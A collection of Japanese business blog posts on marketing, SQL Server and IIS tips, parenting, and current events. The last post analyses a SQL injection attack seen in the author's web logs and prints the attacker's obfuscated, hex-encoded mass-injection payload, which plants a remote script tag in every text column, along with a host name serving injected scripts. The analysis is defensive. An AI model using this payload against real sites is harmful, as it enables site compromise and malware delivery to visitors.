右脳アプローチのマーケティング
伝統的なマーケティングでは、機能面に力点を置いて差異化を進めてきた。
しかし、コモディティ化が進む市場では機能面で差異化を図っても、長期的にその地位をキープすることは非常に難しい。そこで、快楽面が注目されてきているという。
機能面は定量的に示すことが出来る。いわば左脳へのアプローチである。理論的に検討すればその優れているところは一目瞭然である。
快楽面は定性的に示すことになる。これは右脳へのアプローチである。理論的には表現しづらいし、人によってその評価も分かれるだろう。
ラビンドラ・チチェリー米リーハイ大学助教授らの実験によると、機能面での期待に応えられないと「不満」にとどまらず「怒り」が生じ、一定水準を超える機能であれば「安心や信頼」が生じたという。
快楽面での期待に応えられない場合は「不満」にとどまり「怒り」には至らない。しかし、期待を超えたベネフィットがあると「安心や信頼」よりも「喜び」に結びつく。
そしてこの喜びを得た人はクチコミを誘発され、強い再購買意欲も抱く。
これは、コロンビア大学のトリー・ヒギンス教授の制御焦点理論で説明できる。
人々は不快を回避し快に接近しようとするが、不快回避と快接近とでは異なる目標設定を持つため、その後の感情に違いが生じるという。
不快回避では防衛が、快接近は好ましい状態が目標である。
よって、機能的ベネフィットの達成は「安心や信頼」をもたらし、感情的ベネフィットの達成は「喜びや興奮」をもたらしているのである。
(参考)恩蔵直人, 日本経済新聞2009年2月27日朝刊『「非差異化」時代のマーケティング』「快楽」で差異化 第6回
※このブログは、BSP ( ビジネスサポートサービス プロバイダー ) 小山内株式会社 代表取締役によって書かれています。
新しいパチンコの遊び方を提案 パチンコ攻略 パチンコ黄金率
SQL Server ロック中のテーブルをselectする
このアメブロではどのキーワードで検索して訪れてきたかがわかるようになっている。
意外だったのがSQL ServerとASPに関するキーワードが結構多いこと。
ということで、要望に応えて、私のSQL Serverもちネタから1つ。
テーブルの更新中は排他ロックがかかっているためデフォルトではSELECTできない。
SELECTするにもテーブルをロック(共有ロック)しなければならないため、排他ロックが終了するのを待つことになってしまう。
だが、一切ロックしなければ、排他ロック中であってもデータを参照できる。
それがこの方法
select * from table_name with(nolock)
大量なデータ更新を行うと、時として1時間以上かかってしまう場合がある。そんな時はただ待つしかないのだが、「本当にちゃんとやってくれているのかな?」と心配になるものだ。
だが、with(nolock) オプションを使えば、テーブルをSELECTできるので、WHERE句に条件をつけてデータをカウントすることもできる。
select count(*) from table_name with(nolock) where status='close'
これでとりあえずは安心できるというものである。
※このブログは、BSP ( ビジネスサポートサービス プロバイダー ) 小山内株式会社 代表取締役によって書かれています。
子連れ外出事情
ここが困った!子連れ外出事情 (http://dailynews.yahoo.co.jp/fc/domestic/child_care/ )
記事にもあるが、公共交通機関は確かに使いにくい。
特にベビーカーに子どもを乗せて外出するとすぐにわかる。
バリアフリーなどと声高に言われることが多いが、実際にはバリアだらけなんです。
最近はエレベーターの設置が行われているが、以外にもJR川崎駅にはエレベーターがありません。利用者が多く、東海道線、京浜東北線、南武線が乗り入れしているにも関わらず。
また、バスも気を使う。
さっと乗れるように、バスが来る前に子どもをベビーカーから降ろして、抱っこして、ベビーカーをたたんで待っている。
バスに乗ると、ベビーカーは結構かさばるもので、狭い車内では適切な置く場所の確保に困る。
また、哺乳瓶でミルクを飲むときには仰向けにするのだが、ベビーカーを持っていないとそれができない。座れる場所があればよいが、これもなかなか少ないものである。
これもベビーカーを押している場合だが、お店の入り口が自動ドアでないと、重たいガラスの扉を先に開けて、後ろ向きで出入りしなければならない。
レストランは、少なくとも、ある程度広めで、子ども用のイスが準備してあるようなところじゃないと、食事すら困難である。
※このブログは、BSP ( ビジネスサポートサービス プロバイダー ) 小山内株式会社 代表取締役によって書かれています。
[PR]パチンコ攻略
モバイルPCで空いた時間も有効活用
最近流行の「5万円パソコン」。
昨年6月に買ってほとんど毎日使っている。
超重宝しています。
ヨドバシカメラでイーモバイルのデータカードとセットで100円だった。値段よりもイーモバイルに支払う通信費が気になって1ヶ月くらい躊躇していた。
通信費は、携帯電話、自宅のADSL(まだ光じゃないのだ)に加えてデータカードも契約すると毎月いい値段になってしまう。
B5サイズの方が画面が広い分使いやすい。けれども1kgくらいあると毎日持って歩くのは、ジワジワと疲労する。と、あれこれ考えていたのだ。
だが、独立して、外出することが多い上に、基本的に時間が足りない。だから移動中もこの小さいパソコンに向かってカチャカチャとやっているのである。
それにこのくらいの重さならまず気にならない。
電車の中で立ったままでも使うことができる。
何より、リモートデスクトップで自宅においてあるサーバーにアクセスして仕事ができることがいろいろなことを簡単にしてくれる。自宅で仕事をするのも、外出先でやるのもそれほど違いがないのである。
データをいちいちコピーする必要もない。とても便利である。
※このブログは、BSP ( ビジネスサポートサービス プロバイダー ) 小山内株式会社 代表取締役によって書かれています。
[PR]パチンコ攻略
電気工事士
今日は久しぶりに電気工事をやった。
事務所の電灯スイッチが壊れたので交換したのだが、その下のコンセントにも電源を送っていて、結構悩むことになってしまった。
スイッチのカバーを外すと上から3本、そして下のコンセントへ2本行っていて、典型的な配線なのだが、かなり久しぶりですっかり忘れてしまっていた。
間違えると大変なことになるので、ちゃんと配線図を書いて確認してからやろうとしたのだが、まったく覚えていない。
そこで、インターネットで検索したら電気工事士の取得を目指す方々を対象としたホームページに行き当たった。配線図を見ながら懐かしいな、と思うのと同時に、資格取得に向けてがんばっている人たちがまだまだいるんだな、と改めて思った。
私が電気工事士の資格取得をしたのは昭和の終わりごろ。インターネットなんてないから学生にとっては数千円という高額な1冊の本を頼りに勉強した。
電気工事士の試験には実技があって、これがなかなか手ごわい。
お題から配線図が書けないとお話しにならない。少しも悩んでいる時間はない。
電線の長さは限られているから当然失敗は許されない。いちいち定規で測っている時間もないから体を使って図りながら工作をする。
だから何度も練習を繰り返して挑んだ。
第二種電気工事士を取得した翌年、第一種電気工事士の試験を受け、学科も実技も合格したままになっている。実は第一種電気工事士は5年の実務経験が必要なのだが、進路変更したためそれがなく、当然、第一種電気工事士の資格はないままなのが少しもったいなく感じる。
※このブログは、BSP ( ビジネスサポートサービス プロバイダー ) 小山内株式会社 代表取締役によって書かれています。
[PR]パチンコ攻略
ソマリア沖海賊対策に海上自衛隊派遣の方針決定
グローバル化が進み、世界中の国や人が易々と国境を越えて活動する機会が増えた。
それは国境内に限定したこれまでのフレームワークが期待通りに機能しないことを招く。
自らが国境の外に出なくとも、国境を越えて入ってくる者がいるからだ。
地球上の国々は文化も含めて差異が少なくなりつつある。
そんな時、宇宙からの侵略者が地球にやってくる。
そして、侵略者と戦うのはさまざまな国で構成される地球防衛軍。
アニメや映画だけの話ではなさそうである。
海賊がやることはその宇宙からの侵略者と同じだ。
正しく実行しようとする経済を無視して略奪する、命も奪われる。
経済や文化の国境が薄れつつある地球を守ることは自分を守ることになる。
現行法の解釈に課題はあるだろうが、侵略者から地球を守らなければならないことは確かであろう。
※このブログは、BSP ( ビジネスサポートサービス プロバイダー ) 小山内株式会社 代表取締役によって書かれています。
[PR]パチンコ攻略
when nothing but hope and virtue could survive
... in the depth of winter, when nothing but hope and virtue could survive ...
- 20 Jan 2009 -
I'm thinking that we the people on the earth can survive by sharing many things in the next era.
※このブログは、BSP ( ビジネスサポートサービス プロバイダー ) 小山内株式会社 代表取締役によって書かれています。
[PR]パチンコ攻略
ビジネスコンテスト優勝!
本日、ビジネスコンテストで見事優勝しました!
何よりも、当社役員の知の集大成、表現技術の結果です。
途中ドタバタとしたところもありましたが、最終的にはこのプロジェクトにコミットし、見事に組織に貢献した成果です。
審査員からはいくつか課題が出されましたが、かなり事業化の見込みが高いとお褒めの言葉もいただき、CEOとしても鼻高々です。CFO、CSO、CTO、CWO、ありがとうございました。
と、いってもこのコンテスト、聴講生として参加している多摩大学大学院の授業の一環。
橋本大也先生の知識イノベーションというクラスでの課題。約2ヶ月近く使って、グループで事業計画を作成し発表したのだ。
課題には制約があって、メンバーとは直接会うことなく、ネットでのコミュニケーションでプランを作成するというもの。忙しい私たちにとってはむしろありがたい条件でした。
また、審査員には、橋本先生の他、起業家であり投資家でもある方(お名前を出してよいのかわからないので)にもお越しいただいて、きちんと審査していただいたのです。
実際、プラン作成中、かなり本気でやりました。ちょうど同じタイミングで、本業のビジネスプランをあるコンテストに提出するために作成していたので、かなりしんどかったのですが、やればやるほど、ビジネスとして本当に「いける」と思い、本当のビジネスとして取り組みました。
私はどんなにがんばっても単位も評価ももらえるわけではないのですが、そんなことはどうでもよく、橋本先生の授業をとってよかったな、楽しかったな、勉強になったな、と思いました。
さて、これからメンバーと話し合い、ビジネスを実際にやってみたいと思いますねぇ。
※このブログは、BSP ( ビジネスサポートサービス プロバイダー ) 小山内株式会社 代表取締役によって書かれています。
[PR]パチンコ攻略
Response Buffer Limit Exceeded Error on IIS
IIS で ASP を使っていて次のエラーが出る場合:Response Buffer Limit Exceeded
以下、http://support.microsoft.com/kb/925764/ja から抜粋したものですが、もっと単純な理由だった、という経験を書きます。
結論からいうと、データベースに対してクエリを投げていたのですが、次のレコードへ移動する MoveNext を書き忘れていたために、Do Until~Loopが無限ループに入っていたためにおきたエラーでした。
webをいろいろ探したけど、このような原因を指摘しているケースがなかったので、ここでご紹介させていただきました。
[現象]
クライアント Web ブラウザからインターネット インフォメーション サービス (IIS) 6.0 を実行している Web サーバーに、ASP (Active Server Page) に対する要求が送信される状況を考えます。この ASP 要求によってサイズの大きな応答が生成されます。この場合、次の現象が発生することがあります。
・応答が正常に返されません。
・HTTP 500 サーバー エラーが発生し、次のエラー メッセージがクライアントの Web ブラウザに表示されます。
Response オブジェクト エラー 'ASP 0251 : 80004005'
Response Buffer Limit Exceeded
Execution of the ASP page caused the Response Buffer to exceed its configured limit.
・IIS ログ ファイルの cs-uri-query フィールドに、次のエラーが出力されます。
|0|ASP_0251_:_80004005|Response_Buffer_Limit_Exceeded
[原因]
この問題は、IIS 6.0 に導入され、IIS 5.0 に追加された動作上の変更が原因で発生します。この 2 つのバージョンの IIS では、デフォルトの ASP 応答バッファの上限が 4 MB に設定されます。この上限は、サイズの大きな ASP 応答によって Web アプリケーションをホストする IIS プロセスに悪影響が及ばないようにするためのものです。ASP 要求によって、設定されているバッファの上限を超えるサイズの大きな応答が生成された場合、「現象」に記載されている現象が発生します。
[解決方法]
ほとんどの場合、Web クライアントに送信される ASP 応答のバッファ サイズの上限は 4 MB で十分です。この上限を引き上げる必要がある場合は、以下のいずれかの方法を使用します。
方法 1 : 応答のサイズを小さくする
応答のサイズがデフォルト値の 4 MB を超えると、多くの場合、ユーザーはパフォーマンスの低下を感じます。Web ブラウザは、サイズの大きな応答をネットワーク経由で受信する必要があります。さらに、Web ブラウザは非常にサイズの大きな HTML 応答を解析し、表示する必要があります。
応答を受信する Web クライアントが、応答全体を単一のページとして表示する必要がない場合は、応答のサイズを小さくすることができます。たとえば、データがグリッドに表示されるように ASP ベースのアプリケーションを書き直すことができます。これにより、Web クライアントでは、そのデータを一度に 1 ページずつ表示できます。これは、Microsoft ASP.NET の GridView クラスを使用して実現できます。ASP.NET の GridView クラスの詳細については、次の Microsoft Developer Network (MSDN) Web サイトを参照してください。
http://msdn2.microsoft.com/ja-jp/library/system.web.ui.webcontrols.gridview(VS.80).aspx
方法 2 : Response.Flush メソッドを使用する
ASP ファイルで、サイズの大きなテーブルの作成やデータの構成にループを使用している場合は、Response.Flush メソッドを使用できます。このメソッドを使用する場合も、バッファ処理を使用できます。ただし、Web クライアントに送信されるデータ量を完全に制御することもできるので、応答のバッファ サイズを制御できます。Response.Flush メソッドの詳細については、次の MSDN Web サイトを参照してください。
http://msdn2.microsoft.com/en-us/library/ms525560.aspx
方法 3 : バッファ処理を無効にする
Web サーバーでのバッファ処理を、アプリケーション レベルまたはページ レベルで無効にできます。バッファ処理を無効にすると、Web サーバーでは HTTP チャンク転送エンコードを使用して Web クライアントに応答を送信します。
アプリケーション レベルでバッファ処理を無効にするには、IIS メタベース プロパティの AspBufferingOn を使用できます。AspBufferingOn IIS メタベース プロパティの詳細については、次のマイクロソフト Web サイトを参照してください。
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/ja/library/iis/fbe1bd5f-52d4-4a26-8ab1-7bb897bb3d53.mspx
(http://www.microsoft.com/technet/prodtechnol/windowsserver2003/ja/library/iis/fbe1bd5f-52d4-4a26-8ab1-7bb897bb3d53.mspx
)
ページ レベルでバッファ処理を無効にするには、Response.Buffer プロパティを使用できます。Response.Buffer プロパティの詳細については、次の MSDN Web サイトを参照してください。
http://windowssdk.msdn.microsoft.com/en-us/library/ms526001.aspx
方法 4 : バッファ サイズの上限を引き上げる
以下のいずれかの条件に該当する場合、バッファ処理の上限を引き上げることができます。
・クライアントが Web ブラウザではない。
・GridView クラスなどのページング テクノロジを利用するようにアプリケーションの設計を変更することができない。
バッファ サイズの上限を引き上げる必要がある場合、把握している最大の応答サイズを許容するようにバッファ サイズの上限を設定します。応答の最大サイズを事前に把握していない場合は、テスト中はバッファの制限を大きな値に設定してみます。テストの終了後、IIS ログ ファイルで、そのページに対して生成された応答に対応する sc-bytes フィールドを確認し、最も大きな値を使用します。
バッファ サイズの上限を引き上げるには、以下の手順を実行します。
1. [スタート] ボタンをクリックし、[ファイル名を指定して実行] をクリックします。[名前] ボックスに cmd と入力し、[OK] をクリックします。
2. 次のコマンドを入力し、Enter キーを押します。
cd /d %systemdrive%\inetpub\adminscripts
3. 次のコマンドを入力し、Enter キーを押します。
cscript.exe adsutil.vbs SET w3svc/aspbufferinglimit LimitSize
注 : LimitSize にはバッファ処理の上限をバイト単位で指定します。たとえば、67108864 という数値を使用すると、バッファ処理の上限サイズが 64 MB に設定されます。
バッファ サイズの上限が正しく設定されているかどうかを確認するには、以下の手順を実行します。
1. [スタート] ボタンをクリックし、[ファイル名を指定して実行] をクリックします。[名前] ボックスに cmd と入力し、[OK] をクリックします。
2. 次のコマンドを入力し、Enter キーを押します。
cd /d %systemdrive%\inetpub\adminscripts
3. 次のコマンドを入力し、Enter キーを押します。
cscript.exe adsutil.vbs GET w3svc/aspbufferinglimit
※このブログは、BSP ( ビジネスサポートサービス プロバイダー ) 小山内株式会社 代表取締役によって書かれています。
WEBLOG解析 サイバーテロリズム
ホスティングしているサイトが昨晩から2回ダウンした。
サイトがダウンしていることに気づいても、管理会社に直接連絡がとれないので困っている。
サイト移行することを考えないといけないかもしれない。
さて、原因は別にあるようだが、ほぼ時期を同じくしてSQLインジェクションによる攻撃が12/14から始まった。
ちょうどさまざまな対処が功を奏してきて、あるキーワードによる検索結果が1ページ目の上部に表示されるようになっていた。
だから、急にWEBログのファイルサイズが2倍になったので、かなりアクセス数が増加したんだな、と思っていた。
だが、ログを見てみるとやたらと長いクエリが記録されている。
その例を示す。
(SQLインジェクション 1)
%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bCh
Ar(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])
「%20」 は スペース、「%2b」 は 「+」、「%25」 は 「%」に置き換える。さらに、大文字小文字を交互にして、SQLのクエリだとすぐにわからないように細工している。これをわかりやすく書き換えると、
and (select char(94)+cast(count(1) as varchar(100))+char(94) from
[master]..[sysdatabases])
となる。SQL Serverのデータベースの数を取得しようとしているのである。
(SQLインジェクション 2)
;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C41524520405420
5641524348415228323535292C404320564152434841522832353529204445434C415245
205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E6
16D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C
756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D
27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5
220622E78747970653D323331204F5220622E78747970653D31363729204F50454E2054
61626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437
572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455
533D302920424547494E20455845432827555044415445205B272B40542B275D2053455
4205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303
030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2
F732E6361776A622E636F6D2F736A702E6A733E3C2F7363726970743E272727292046
45544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542
C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);
実はこれが曲者である。ぱっと見てもよくわからないから、問題ないとして見なかったことにしておきたくなるが、最後に「exec(@s)」があるので見過ごせないことにすぐに気づく。
「44」は「D」、「45」は「E」であるから、コードを文字に変換すると以下のようになる。
;declare @S varchar(4000) set @s=cast(
DECLARE
@T VARCHAR(255),
@C VARCHAR(255)
DECLARE Table_Cursor
CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND
(b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC
('UPDATE ['+@T+'] SET
['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
as varchar(40000)); exec(@s)
要は、テーブル名と各テーブルの列名を取得し、その列にある文字列を挿入しようというもの。
例えば、あるユーザーが、被害にあったサイトのページを開く。そのページはデータベースをselectして、挿入されたスクリプトを表示してしまう。
そのスクリプトはクライアントで実行され、被害が拡大する、といった感じ。
予防策は、URIクエリをチェックする仕組みをwebアプリに組み込んでおくことが重要である。
もちろん、データベース側でwebアプリが使うアカウントに最小限の権限を付与しておくことも有効であるが、あまり細かく設定すると管理が難しくなるので、さじ加減を注意する必要がある。
sa権限をもったアカウントをwebアプリに使わせるというのはもっての他であることは言うまでもない。
被害にあったと思われるサイトを検索してみる。くれぐれもクリックして表示しないようにしてください。
http://www.google.co.jp/search?hl=ja&lr=lang_ja&q=%22%3Cscript+src%3Dhttp://flyshu.8866.org/jp/Help.asp%3E%3C/script%3E%22&start=0&sa=N
※このブログは、BSP ( ビジネスサポートサービス プロバイダー ) 小山内株式会社 代表取締役によって書かれています。
[PR]パチンコ攻略